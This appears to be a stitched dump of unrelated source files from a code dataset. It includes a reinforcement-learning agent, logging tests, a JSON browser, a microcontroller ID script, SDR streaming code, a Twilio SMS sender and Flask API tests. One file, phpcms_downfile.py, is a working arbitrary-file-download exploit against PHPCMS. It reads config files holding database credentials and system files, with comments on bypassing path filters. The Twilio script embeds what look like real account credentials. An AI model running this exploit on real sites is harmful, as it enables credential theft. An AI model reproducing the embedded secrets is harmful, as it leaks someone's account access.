self.rewards)\r\n value_loss2 = tf.square(\r\n tf.squeeze(cliped_values) - self.rewards)\r\n\r\n self.value_loss = 0.5 * \\\r\n tf.reduce_mean(tf.maximum(value_loss1, value_loss2))\r\n\r\n action_one_hot = tf.one_hot(\r\n self.actions, self.action_size, dtype=tf.float32)\r\n\r\n log_policy = tf.log(tf.reduce_sum(\r\n self.policy * action_one_hot, axis=1))\r\n old_log_policy = tf.log(tf.reduce_sum(\r\n self.old_policy * action_one_hot, axis=1))\r\n\r\n ratio = tf.exp(log_policy - old_log_policy) # pnew / pold\r\n\r\n std_advantages = (self.advantages - tf.reduce_mean(self.advantages)) / (tf.math.reduce_std(self.advantages) + 1e-8)\r\n cliped_ratio = tf.clip_by_value(\r\n ratio, 1.0 - self.clip_range, 1.0 + self.clip_range)\r\n policy_loss1 = - ratio * std_advantages\r\n policy_loss2 = - cliped_ratio * std_advantages\r\n\r\n # PPO's pessimistic surrogate (L^CLIP)\r\n self.policy_loss = tf.reduce_mean(tf.maximum(policy_loss1, policy_loss2))\r\n\r\n #self.entropy = tf.reduce_mean(self.calc_entropy(self.policy_logits))\r\n \r\n self.entropy = tf.reduce_mean(tf.reduce_sum(- self.policy * tf.log(tf.clip_by_value(self.policy, 1e-7, 1)), axis=1))\r\n self.total_loss = self.vf_coef * self.value_loss + \\\r\n self.policy_loss - self.ent_coef * self.entropy\r\n\r\n tf.summary.scalar('policy_loss', self.policy_loss)\r\n tf.summary.scalar('entropy_loss', self.entropy)\r\n tf.summary.scalar('total_loss', self.total_loss)\r\n tf.summary.scalar('episode_rewards', self.episode_rewards)\r\n tf.summary.scalar('max_episode_rewards', self.max_episode_rewards)\r\n\r\n optimizer = tf.train.AdamOptimizer(learning_rate=self.lr)\r\n\r\n grads = tf.gradients(self.total_loss, self.local_vars)\r\n\r\n if self.max_grad_norm is not None:\r\n grads, _ = tf.clip_by_global_norm(\r\n grads, self.max_grad_norm)\r\n grads = list(zip(grads, self.local_vars))\r\n\r\n def l2_norm(t): return tf.sqrt(tf.reduce_sum(tf.pow(t, 2)))\r\n for gradient, variable in grads:\r\n tf.summary.histogram(\r\n \"gradients/\" + variable.name, l2_norm(gradient))\r\n tf.summary.histogram(\r\n \"variables/\" 
+ variable.name, l2_norm(variable))\r\n\r\n self.train_model_op = optimizer.apply_gradients(grads)\r\n self.summaries_op = tf.summary.merge_all()\r\n\r\n self.sess.run(tf.initialize_variables(tf.get_collection(\r\n tf.GraphKeys.GLOBAL_VARIABLES, scope=self.name)))\r\n\r\n if loadModel:\r\n self.load_weights()\r\n\r\n def create_sync_ops(self, from_model):\r\n return [tf.assign(to_var, from_var) for (to_var, from_var) in zip(\r\n tf.trainable_variables(self.name), tf.trainable_variables(from_model.name))]\r\n\r\n def calc_entropy(self, logits):\r\n a0 = logits - tf.reduce_max(logits, axis=-1, keepdims=True)\r\n ea0 = tf.exp(a0)\r\n z0 = tf.reduce_sum(ea0, axis=-1, keepdims=True)\r\n p0 = ea0 / z0\r\n return tf.reduce_sum(p0 * (tf.log(z0) - a0), axis=-1)\r\n\r\n def save_weights(self):\r\n self.saver.save(self.sess, f\"./{self.name}.ckpt\")\r\n\r\n def load_weights(self):\r\n self.saver.restore(self.sess, f\"./{self.name}.ckpt\")\r\n\r\n def get_actions_and_values(self, state):\r\n return self.sess.run([self.policy, self.values], feed_dict={self.state: state})\r\n\r\n def get_action(self, state):\r\n return self.sess.run(self.policy, feed_dict={self.state: state})\r\n\r\n def get_value(self, state):\r\n return self.sess.run(self.values, feed_dict={self.state: state})\r\n\r\n def train(self, states, actions, rewards, advantages, old_policy, old_values):\r\n _, value_loss, policy_loss, entropy = self.sess.run([self.train_model_op, self.value_loss, self.policy_loss, self.entropy], {\r\n self.state: states, self.actions: actions, self.rewards: rewards, self.advantages: advantages, self.old_policy: old_policy, self.old_values: old_values})\r\n print(\r\n f\"critic_loss:{value_loss}, actor_loss:{policy_loss}, entropy:{entropy}\")\r\n\r\n def get_summary(self, states, actions, rewards, advantages, max_episode_rewards, episode_rewards, old_policy, old_values):\r\n summary = self.sess.run(self.summaries_op, feed_dict={\r\n self.max_episode_rewards: max_episode_rewards, self.episode_rewards: episode_rewards, self.state: states, self.actions: actions, self.rewards: rewards, self.advantages: advantages, self.old_policy: old_policy, self.old_values: old_values})\r\n return summary\r\n","sub_path":"a2c_agent.py","file_name":"a2c_agent.py","file_ext":"py","file_size_in_byte":8440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"89877174","text":"import sys\nimport unittest\nimport datetime\n\nimport bllog\nfrom bllog import LogFormatter\nfrom bllog.log_classes import LogLevel\nfrom bllog.logger import LogMessage\n\n\nclass FormatTests(unittest.TestCase):\n\n def test_date_find(self):\n fmt = 'asd {date_time:%Y} sad {}'\n formatter = LogFormatter(fmt)\n self.assertTrue(formatter.has_date)\n self.assertEqual('%Y', formatter.date_fmt_str)\n\n def test_format(self):\n test_message = LogMessage('test message', LogLevel.WARNING, 123,\n datetime.datetime(2020, 1, 1, 12, 12, 35, 112233))\n\n formatter1 = LogFormatter('[{thread_id} ]')\n self.assertEqual('[123 ]', formatter1.format(test_message))\n\n formatter2 = LogFormatter('{AS: {level} }')\n self.assertEqual('{AS: WARNING }', formatter2.format(test_message))\n\n formatter3 = LogFormatter(' || {date_time:%Y..%d} || ')\n self.assertEqual(' || 2020..01 || ', formatter3.format(test_message))\n\n formatter4 = LogFormatter('{date_time} [{level}]: {message}')\n self.assertEqual('2020-01-01 12:12:35.112233 [WARNING]: test message', formatter4.format(test_message))\n\n def test_manual_log(self):\n cstream = 
bllog.StreamBuilder().console().format_level_color().format_symbol_color().build()\n        fstream = bllog.StreamBuilder().named_file('test_log.log').build()\n        logger = bllog.LoggerBuilder().name('Test Log').streams([cstream,fstream]).build()\n\n        logger.log(LogMessage('Test Trace', LogLevel.TRACE, 112233,datetime.datetime.now()))\n        logger.log(LogMessage('Test Debug', LogLevel.DEBUG, 112233,datetime.datetime.now()))\n        logger.log(LogMessage('Test Info', LogLevel.INFO, 112233,datetime.datetime.now()))\n        logger.log(LogMessage('Test Warning', LogLevel.WARNING, 112233,datetime.datetime.now()))\n        logger.log(LogMessage('Test Error', LogLevel.ERROR, 112233,datetime.datetime.now()))\n        logger.log(LogMessage('Test Fatal', LogLevel.FATAL, 112233,datetime.datetime.now()))\n\n        logger.trace(\"Trace Test\")\n        logger.debug(\"Debug Test\")\n        logger.info(\"Info Test\")\n        logger.warning(\"Warning Test\")\n        logger.error(\"Error Test\")\n        logger.fatal(\"Fatal Test\")\n\n        print('Random Print')\n        sys.stderr.write('Random stderr')\n        self.assertTrue(True)\n\n\nif __name__ == '__main__':\n    FormatTests().test_manual_log()","sub_path":"tests/simple_tests.py","file_name":"simple_tests.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"371507996","text":"import json\n\n\ndef get_key_values(data: dict, target: str) -> list:\n    \"\"\"\n    Returns all values in dict depending on the key\n    :param data: dict, in which values will be looked for\n    :param target: value of the key\n    :return: list of all found values\n    \"\"\"\n    temp = []\n\n    def dfs_get_values(parent: object, target):\n        if isinstance(parent, dict):\n            for key in parent:\n                if key == target:\n                    temp.append(parent[key])\n                else:\n                    dfs_get_values(parent[key], target)\n        if isinstance(parent, list):\n            for item in parent:\n                dfs_get_values(item, target)\n    dfs_get_values(data, target)\n    return temp\n\n\ndef get_dict_from_json(json_file_path: str) -> dict:\n    \"\"\"\n    Transforms json file to dict\n    :param json_file_path: path to json file\n    :return: transformed dictionary\n    \"\"\"\n    with open(json_file_path, mode='r') as f:\n        data = json.load(f)\n    return data\n\n\ndef analyze_dict(dct: object):\n    \"\"\"\n    Analyzes the dict\n    :param dct: dictionary, which we want to analyze\n    :return: True\n    \"\"\"\n    temp = [dct]\n    while temp:\n        sub_elem = temp[-1]\n        if isinstance(sub_elem, list):\n            print(\"There are available indexes in range of {}\"\n                  .format(len(sub_elem)))\n        elif isinstance(sub_elem, dict):\n            print(\"There are available keys of dict:\\n{}\"\n                  .format('\\n'.join([el for el in sub_elem])))\n        else:\n            print(sub_elem)\n        key = input(\"Enter the command or the key/index value,\"\n                    \" which u want to look for: \")\n        if key == 'PRINT':\n            print(temp[-1])\n        elif key == 'ESCAPE':\n            print(\"Hope u enjoyed using this program...\")\n            return True\n        elif key == 'BACK':\n            temp.pop()\n            continue\n        elif key.isdigit():\n            temp.append(sub_elem[int(key)])\n        else:\n            temp.append(sub_elem[key])\n    print(\"Hope u enjoyed this program\")\n\n\ndef main(path: str):\n    \"\"\"\n    Runs a program which is used for analysing json files\n    :return: None\n    \"\"\"\n    dct_from_json = get_dict_from_json(path)  # use the path argument; this was hard-coded to 'form.json'\n    opening_text = \"Enter the variant of realization:\\n\"\\\n                   + \"If u know the key and want to search\" \\\n                     \" for all values by this key, enter '1'\\n\" +\\\n                   \"If u want to search for values step by step, enter '2'\\n: \"\n    var = input(opening_text)\n    try:\n        if var == '1':\n            key = input(\"Enter the key value: \")\n 
print(get_key_values(dct_from_json, key))\n        elif var == '2':\n            commands_text = \"LIST of commands:\\n\" +\\\n                            \"1) to print the current object,\" \\\n                            \" please type 'PRINT'\\n\" +\\\n                            \"2) to get back, please type 'BACK'\\n\" + \\\n                            \"3) to escape from program, type 'ESCAPE'\\n\"\n            print(commands_text)\n            analyze_dict(dct_from_json)\n        else:\n            print(\"There are no more variants of realization, sorry\")\n    except (KeyError, ValueError, IndexError):\n        print(\"Enter the true value of key/index!\")\n\n\nif __name__ == \"__main__\":\n    main('form.json')","sub_path":"analyze_json_file.py","file_name":"analyze_json_file.py","file_ext":"py","file_size_in_byte":3310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"120620487","text":"import re\n\ndef ParseModelAndRev(text):\n\tm = re.match(r\"^0x[a-z0-9]+: ([0-9a-f]+) ([0-9a-f]+)$\", text)\n\tif not m:\n\t\traise AttributeError(\"Model/revision unparseable: got %s\" % text)\n\n\tmodel_id = m.group(1)\n\tassert len(model_id) == 4\n\tmodel_id = model_id[1:] # first char \"reserved\"\n\trevision_id = m.group(2)\n\tmodel_name = {\n\t\t\"422\": \"STM32F303xB/C or STM32F358\",\n\t\t\"438\": \"STM32F303x6/8 or STM32F328\",\n\t\t\"446\": \"STM32F303xD/E or STM32F398xE\",\n\t}.get(model_id)\n\tif not model_name:\n\t\traise AttributeError(\"Unknown model id: %s\" % model_id)\n\n\trevision_name = {\n\t\t\"1001\": \"Z\",\n\t\t\"1003\": \"Y\",\n\t}.get(revision_id)\n\tif not revision_name:\n\t\traise AttributeError(\"Unknown revision id: %s\" % revision_id)\n\n\treturn model_name, revision_name\n\n\ndef ParseUUID(text):\n\tm = re.match(r\"^0x[a-z0-9]+: ([0-9a-f]+) ([0-9a-f]+)$\", text)\n\tif not m:\n\t\traise AttributeError(\"UUID unparseable: got %s\" % text)\n\tuid = m.group(1) + m.group(2)\n\treturn uid\n\ndef PickNodeNumber(existing, uid):\n\tif uid in existing:\n\t\tnum = existing[uid]\n\t\t# print(\"Device already known as node #%s\" % num)\n\t\treturn num, False\n\telse:\n\t\ttaken_numbers = set(existing.values())\n\t\tfor i in range(250):\n\t\t\tif i not in taken_numbers:\n\t\t\t\t# print('Assigning new number %s' % i)\n\t\t\t\treturn i, True\n\t\traise ValueError('Failed to assign new node number')\n\n\nwith open('device_identifiers.output', 'r') as f:\n\tlines = f.readlines()\n\tif len(lines) < 2: raise AttributeError(\"File too short\")\n\n\tmodel_name, revision_name = ParseModelAndRev(lines[0].strip())\n\tuid = ParseUUID(lines[1].strip())\n\n# print(\"MCU: %s, rev %s\" % (model_name, revision_name))\n# print(\"UID:\", uid)\n\nDB_FILE = 'device_database.txt'\n\t\t\nwith open(DB_FILE, 'r') as f:\n\texisting = {}\n\tfor l in f.readlines():\n\t\tdb_uid, node_number = l.split(' ')  # separate names so the device uid read above is not clobbered\n\t\texisting[db_uid] = int(node_number)  # int() strips the newline and matches the int candidates tested in PickNodeNumber\n\nnumber, is_new = PickNodeNumber(existing, uid)\nif is_new:\n\twith open(DB_FILE, 'a') as f:\n\t\tf.write('%s %s\\n' % (uid, number))\n\nprint(number)","sub_path":"custom_applications/crossing_controller/targets/freertos.armv7m.st-stm32f303re-nucleo/extract_node_uuid.py","file_name":"extract_node_uuid.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"606052298","text":"#!/usr/bin/python\nimport socket\nimport json\nimport os\n\nDN=1\nHOST='localhost'\nPORT=12900+DN\nTX_PORT=12800+DN\n\n# Connect to AVS4000 API socket\nsock=socket.socket(socket.AF_INET,socket.SOCK_STREAM);\nsock.connect((HOST,PORT));\n\n# Create REQ\nP={}; # Set REQ Map\nTX={}; # TX Group Map\nTXD={}; # TXDATA Group 
Map\nTX[\"sampleRate\"]=15e6 # TX Sample Rate\nTXD[\"conEnable\"]=True; # enable RX Data Connection\nTXD[\"conType\"]=\"tcp\"; # Specify to use TCP\nTXD[\"conPort\"]=TX_PORT; # Specify TCP Port to listen on\nTXD[\"useV49\"]=False; # Receive Raw IQ Data\nTXD[\"run\"]=True; # Start the stream\nP[\"tx\"]=TX; # Add TX Group Map to REQ\nP[\"txdata\"]=TXD; # Add TXDATA Group Map to REQ\n\nREQ=['set',P]; # Create REQ for SET Command\n\nsock.send(json.dumps(REQ)); # Convert REQ to JSON and send on socket\nstr=sock.recv(8192); # Receive the RSP\nRSP=json.loads(str); # Parse JSON to Python list\nprint (RSP); # Print the RSP\n\n# Use SOCAT utitiltiy to connect to TCP TX Data Socket\n# read data from file 'tx.out'.\nos.system(\"socat -u FILE:tx.out TCP:localhost:%d &\"%(TX_PORT))\n","sub_path":"utilities/starttx.py","file_name":"starttx.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"39983952","text":"# coding: utf-8\n\nimport sys\nimport requests\nimport re\n\ndef poc(target,filepath):\n\n print('[*]Trying to get cookie_siteid ')\n url = target +'index.php?m=wap&c=index&a=init&siteid=1'\n s = requests.Session()\n r = s.get(url)\n if('set-cookie' in r.headers):\n cookie_siteid =r.headers['set-cookie']\n cookie_siteid = cookie_siteid[cookie_siteid.index('=')+1:]\n print('[+]cookie_siteid = '+cookie_siteid)\n else:\n print('[-]Can not get cookie_siteid ')\n sys.exit()\n\n print('[*]Trying to get att_json ')\n #use < to escape php strip\n # filepath = filepath.replace('/','%2f')\n url = target + '/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id%3D1%26m%3D1%26f%3D'+filepath+'%253C%26modelid%3D1%26catid%3D1%26s%3D%26i%3D1%26d%3D1%26'\n post_data = {\n 'userid_flash':cookie_siteid\n }\n r = s.post(url,post_data)\n for cookie in s.cookies:\n if '_att_json' in cookie.name:\n cookie_att_json = cookie.value\n if('cookie_att_json' in vars()):\n print('[+]cookie_att_json = '+cookie_att_json)\n else:\n print('[-]Can not get cookie_att_json ')\n sys.exit()\n\n print('[*]Trying to get download link ')\n url = target + 'index.php?m=content&c=down&a_k=' + cookie_att_json\n # print(url)\n r = s.get(url)\n if 'm=content&c=down&a=download&a_k=' in r.text:\n # print(r.text)\n link_rule = r'<a href=\"(.*?)\"'\n link = re.findall(link_rule,r.text)\n downloadurl = target+'index.php'+link[0]\n print('[+]download link = '+downloadurl)\n else:\n return False\n\n r = s.get(downloadurl)\n print(r.text)\n\nif __name__ == \"__main__\":\n ##适用条件windows下\n #V9.6.1以前 ./caches/configs/system.ph\n #V9.6.2增加..等路径限制\n #c:Windows/System32/drivers/etc/hosts #绕过\"..\"及其他的路径限制\n #c:Windows/Repair/sam\n #./caches/configs/database.php/ #绕过php文件格式的限制,特定PHP版本可成功\n\n poc('http://192.168.66.38:82/','./caches/configs/database.php/')","sub_path":"PHPCMS/phpcms_downfile.py","file_name":"phpcms_downfile.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"589326511","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#pip install twilio\nfrom twilio.rest import Client\n# Your Account SID from twilio.com/console\naccount_sid = \"ACd5242d06de06c0cef18e4f6efc3727ee\"\n# Your Auth Token from twilio.com/console\nauth_token = \"632bd339556b7d0cd96fabc7260dbdfe\"\nclient = Client(account_sid, auth_token)\nmessage = client.messages.create(\n# 这里中国的号码前面需要加86\nto=\"+86 189 5813 2148\",\nfrom_=\"+12053509575\",\nbody=\"hi!this is a test 
message\") #body内容不能是中文,不然无法接收!\nprint(message.sid)\nprint(\"OKOK!!\")","sub_path":"创建新虚机/发送短信.py","file_name":"发送短信.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"265334141","text":"import logging\nimport os\nfrom typing import Callable\n\nimport django.dispatch\nimport psutil\nfrom django.apps import AppConfig\nfrom django.db import DatabaseError\nfrom django.db.models.signals import post_save, pre_delete\nfrom django.dispatch import receiver\nfrom django.utils.translation import ugettext_lazy as _\n\nlogger = logging.getLogger(__name__)\nf_none = lambda *args, **kwargs: None\n\n# sender - Book model\n# book - Book instance\n# lang - Language instance or lang code\n# source - Model which cause book update\nbook_changed = django.dispatch.Signal(providing_args=[\"book\", \"lang\", \"source\"])\n\n\nclass BooksConfig(AppConfig):\n name = 'books'\n verbose_name = _(\"Книги\")\n\n def get_run_type(self):\n \"\"\"\n Get type of django instance\n\n :return: server | <manage command> | <celery command>\n \"\"\"\n p = psutil.Process(os.getpid())\n cmdline = p.cmdline()\n if cmdline[0].endswith(\"wsgi\"):\n return \"server\"\n if cmdline[1].endswith(\"manage.py\"):\n if cmdline[2] == \"runserver\":\n return \"server\"\n return cmdline[2].strip()\n if cmdline[1].endswith(\"celery\"):\n return cmdline[2]\n return None\n\n def ready(self):\n from books.tasks import update_book\n from books.validators import BookValidator\n\n Book = self.get_model('Book')\n Image = self.get_model('Image')\n TextFragment = self.get_model('TextFragment')\n BookLanguage = self.get_model('BookLanguage')\n\n @receiver(book_changed, weak=False, dispatch_uid=\"on_book_changed\")\n def on_book_changed(sender, book, lang, source, **kwargs):\n logger.info(f\"<Signal (book_changed) sender='{sender}' book='{book}' lang='{lang}'>\")\n if book is None:\n return\n if lang:\n lang_code = lang if isinstance(lang, str) else lang.code\n book_lang = BookLanguage.objects.get(book=book, lang__code=lang_code)\n if not book_lang.hidden:\n update_book.delay(book.id, lang_code)\n else:\n for code in book.languages.filter(booklanguage__hidden=False).values_list(\"code\", flat=True):\n update_book.delay(book.id, code)\n\n run_type = self.get_run_type()\n\n # Enable signals and cache only on wsgi and runserver\n if run_type == \"server\":\n self.connect(\n Book,\n signals=(post_save,),\n book_getter=lambda self: self,\n lang_getter=f_none\n )\n self.connect(\n Image,\n book_getter=lambda self: self.book,\n lang_getter=f_none\n )\n self.connect(\n TextFragment,\n book_getter=lambda self: self.book,\n lang_getter=lambda self: self.lang\n )\n\n # Initialize cache\n try:\n for book in Book.objects.all():\n for book_lang in book.book_languages.all():\n code = book_lang.lang.code\n book_lang.validation_errors = [error.to_json() for error in BookValidator(book, code)]\n book_lang.save()\n msg = f'Book \"{book.get_title(code)}\" ({code}) validated.' 
\\\n                              f' {len(book_lang.validation_errors)} errors found.'\n                        if book_lang.validation_errors:\n                            logger.warning(msg)\n                        else:\n                            logger.info(msg)\n\n                        update_book.delay(book.id, code, keep_timestamp=True)\n            except DatabaseError:\n                pass\n\n    def connect(\n            self, model,\n            book_getter: Callable[[object], object], lang_getter: Callable[[object], object],\n            condition: Callable[[object], bool] = None, signals=(post_save, pre_delete)\n    ):\n        Book = self.get_model('Book')\n\n        @receiver(signals, sender=model, weak=False, dispatch_uid=f\"book_update:{model._meta.model_name}:on_change\")\n        def on_change(sender, instance, *args, **kwargs):\n            logger.info(f\"<Signal {signals}> sender='{sender}' instance='{instance}'\")\n            if not (condition is None or condition(instance)):\n                return\n            book = book_getter(instance)\n            if book:\n                lang = lang_getter(instance)\n                book_changed.send(sender=Book, book=book, lang=lang, source=model)\n","sub_path":"src/books/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"563929239","text":"import sys\nfrom optparse import OptionParser\nimport json\n\n\ndef trans(number):\n    return str(number)\n\n\ndef load_json(input_file_name):\n    with open(input_file_name, 'rU') as f:\n        data = json.load(f)\n    return list(map(trans, data['fields']['target-field']))  # list(): a bare map object is not JSON-serializable in Python 3\n\n\ndef dump_json(output_file_name, data):\n    with open(output_file_name, 'w') as f:\n        json.dump(data, f)\n\n\nif __name__ == \"__main__\":\n    optparser = OptionParser()\n    optparser.add_option('-f', '--inputFile',\n                         dest='input',\n                         help='filename containing json for input',\n                         default=None)\n    optparser.add_option('-o', '--outputFile',\n                         dest='output',\n                         help='filename containing json for output',\n                         default=None)\n    (options, args) = optparser.parse_args()\n    if options.input is None:\n        print('No input filename specified, system will exit\\n')\n        sys.exit('System will exit')\n    if options.output is None:\n        print('No output filename specified, system will exit\\n')\n        sys.exit('System will exit')\n    data = dict()\n    data['transed-target-fields'] = load_json(options.input)\n    dump_json(options.output, data)","sub_path":"runnable/number2string.py","file_name":"number2string.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"128503851","text":"# Test cases can be run with:\n# nosetests\n# coverage report -m\n\n\"\"\" Test cases for the Customer Service \"\"\"\nimport os\nimport logging\nimport unittest\nimport json\nfrom mock import MagicMock, patch\nfrom flask_api import status    # HTTP Status Codes\nfrom app.models import Customer\n\nfrom app import server, db\n\n# from nose.tools import set_trace\n\nDATABASE_URI = os.getenv('DATABASE_URI', None)\n######################################################################\n#  T E S T   C A S E S\n######################################################################\nclass TestCustomerServer(unittest.TestCase):\n    \"\"\" Customer Server Tests \"\"\"\n\n    @classmethod\n    def setUpClass(cls):\n        \"\"\" Run once before all tests \"\"\"\n        server.app.debug = False\n        server.initialize_logging(logging.INFO)\n        # Set up the test database\n        if DATABASE_URI:\n            server.app.config['SQLALCHEMY_DATABASE_URI'] = DATABASE_URI\n\n\n    @classmethod\n    def tearDownClass(cls):\n        pass\n\n    def setUp(self):\n        server.init_db(reset=True)\n        server.Customer(firstname = 'fido', lastname = 'dog').save()\n        
server.Customer(firstname = 'kitty', lastname = 'cat').save()\n        self.app = server.app.test_client()\n\n    def tearDown(self):\n        \"\"\" Runs after each test \"\"\"\n        db.session.close_all()\n\n    def test_index(self):\n        \"\"\" Test the Home Page \"\"\"\n        resp = self.app.get('/')\n        self.assertEqual(resp.status_code, status.HTTP_200_OK)\n        self.assertEqual(resp.content_type, 'text/html; charset=utf-8')\n\n    def test_get_customer_list(self):\n        \"\"\" Get a list of Customers \"\"\"\n        resp = self.app.get('/customers')\n        self.assertEqual(resp.status_code, status.HTTP_200_OK)\n        data = json.loads(resp.data)\n        self.assertEqual(len(data), 2)\n        Customer.remove_all()\n        resp = self.app.get('/customers')\n        self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)\n\n    def test_get_customer(self):\n        \"\"\" Get one Customer \"\"\"\n        resp = self.app.get('/customers/2')\n        self.assertEqual(resp.status_code, status.HTTP_200_OK)\n        data = json.loads(resp.data)\n        self.assertEqual(data['firstname'], 'kitty')\n\n    def test_get_customer_not_found(self):\n        \"\"\" Get a Customer that's not found \"\"\"\n        resp = self.app.get('/customers/0')\n        self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)\n\n    def test_create_customer(self):\n        \"\"\" Create a Customer \"\"\"\n        # save the current number of customers for later comparison\n        customer_count = self.get_customer_count()\n        # add a new customer\n        new_customer = {'firstname': 'sammy', 'lastname': 'snake'}\n        data = json.dumps(new_customer)\n        resp = self.app.post('/customers', data=data, content_type='application/json')\n        self.assertEqual(resp.status_code, status.HTTP_201_CREATED)\n        # Make sure location header is set\n        location = resp.headers.get('Location', None)\n        self.assertIsNotNone(location)\n        # Check the data is correct\n        new_json = json.loads(resp.data)\n        self.assertEqual(new_json['firstname'], 'sammy')\n        # check that count has gone up and includes sammy\n        resp = self.app.get('/customers')\n        data = json.loads(resp.data)\n        self.assertEqual(resp.status_code, status.HTTP_200_OK)\n        self.assertEqual(len(data), customer_count + 1)\n        self.assertIn(new_json, data)\n\n    def test_update_customer(self):\n        \"\"\" Update a Customer \"\"\"\n        new_kitty = {'firstname': 'kitty', 'lastname': 'tabby'}\n        data = json.dumps(new_kitty)\n        resp = self.app.put('/customers/2', data=data, content_type='application/json')\n        self.assertEqual(resp.status_code, status.HTTP_200_OK)\n        resp = self.app.get('/customers/2', content_type='application/json')\n        self.assertEqual(resp.status_code, status.HTTP_200_OK)\n        new_json = json.loads(resp.data)\n        self.assertEqual(new_json['lastname'], 'tabby')\n\n    def test_update_customer_with_invalid_credit(self):\n        \"\"\" Update a Customer with invalid credit \"\"\"\n        new_kitty = {'firstname': 'kitty', 'lastname': 'tabby', 'valid': True,'credit_level': -1}\n        data = json.dumps(new_kitty)\n        resp = self.app.put('/customers/2', data=data, content_type='application/json')\n        
self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)\n        another_kitty = {'firstname': 'kitty', 'lastname': 'tabby', 'valid': False,'credit_level': 1}\n        data = json.dumps(another_kitty)\n        resp = self.app.put('/customers/2', data=data, content_type='application/json')\n        self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)\n\n    def test_update_customer_with_no_firstname(self):\n        \"\"\" Update a Customer with no firstname \"\"\"\n        new_customer = {'lastname': 'dog'}\n        data = json.dumps(new_customer)\n        resp = self.app.put('/customers/2', data=data, content_type='application/json')\n        self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)\n\n    def test_update_customer_not_found(self):\n        \"\"\" Update a Customer that can't be found \"\"\"\n        new_kitty = {\"firstname\": \"timothy\", \"lastname\": \"mouse\"}\n        data = json.dumps(new_kitty)\n        resp = self.app.put('/customers/0', data=data, content_type='application/json')\n        self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)\n\n    def test_delete_customer(self):\n        \"\"\" Delete a Customer that exists \"\"\"\n        # save the current number of customers for later comparison\n        customer_count = self.get_customer_count()\n        # delete a customer\n        resp = self.app.delete('/customers/2', content_type='application/json')\n        self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)\n        self.assertEqual(len(resp.data), 0)\n        new_count = self.get_customer_count()\n        self.assertEqual(new_count, customer_count - 1)\n\n    def test_create_customer_with_no_firstname(self):\n        \"\"\" Create a Customer with the name missing \"\"\"\n        new_customer = {'lastname': 'dog'}\n        data = json.dumps(new_customer)\n        resp = self.app.post('/customers', data=data, content_type='application/json')\n        self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)\n\n    def test_get_nonexisting_customer(self):\n        \"\"\" Get a Customer that doesn't exist \"\"\"\n        resp = self.app.get('/customers/5')\n        self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)\n\n    def test_query_customer_list_by_lastname(self):\n        \"\"\" Query Customers by Last Name \"\"\"\n        resp = self.app.get('/customers?lastname=dog', content_type='application/json')\n        self.assertEqual(resp.status_code, status.HTTP_200_OK)\n        self.assertTrue(len(resp.data) > 0)\n        self.assertTrue('fido' in resp.data)\n        self.assertFalse('Dada' in resp.data)\n        data = json.loads(resp.data)\n        query_item = data[0]\n        self.assertEqual(query_item['lastname'], 'dog')\n\n    def test_query_customer_list_by_firstname(self):\n        \"\"\" Query Customers by First Name \"\"\"\n        resp = self.app.get('/customers?firstname=fido', content_type='application/json')\n        self.assertEqual(resp.status_code, status.HTTP_200_OK)\n        self.assertTrue(len(resp.data) > 0)\n        self.assertTrue('fido' in resp.data)\n        self.assertFalse('Miamia' in resp.data)\n        data = json.loads(resp.data)\n        query_item = data[0]\n        self.assertEqual(query_item['firstname'], 'fido')\n        server.Customer.remove_all()\n        resp = self.app.get('/customers?firstname=fido', content_type='application/json')\n        self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)\n\n    def test_query_customer_list_by_unsupported_field(self):\n        \"\"\" Query Customers by None Parameter\"\"\"\n        resp = self.app.get('/customers?gender=male', content_type='application/json')\n        self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)\n\n    def test_query_no_customer(self):\n        \"\"\" Query used when no customer is available \"\"\"\n        server.Customer.remove_all()\n        resp = self.app.get('/customers?lastname=dog', content_type='application/json')\n        self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)\n\n    def test_method_not_allowed(self):\n        \"\"\" Call a Method that's not Allowed \"\"\"\n        resp = self.app.post('/customers/0')\n        self.assertEqual(resp.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)\n\n    @patch('app.server.Customer.find_by_kargs')\n    def test_mock_search_data_internal_error(self, customer_find_mock):\n        \"\"\" Mocking the Server Internal Error \"\"\"\n        customer_find_mock.side_effect = OSError()\n        resp = self.app.get('/customers?firstname=fido', content_type='application/json')\n        
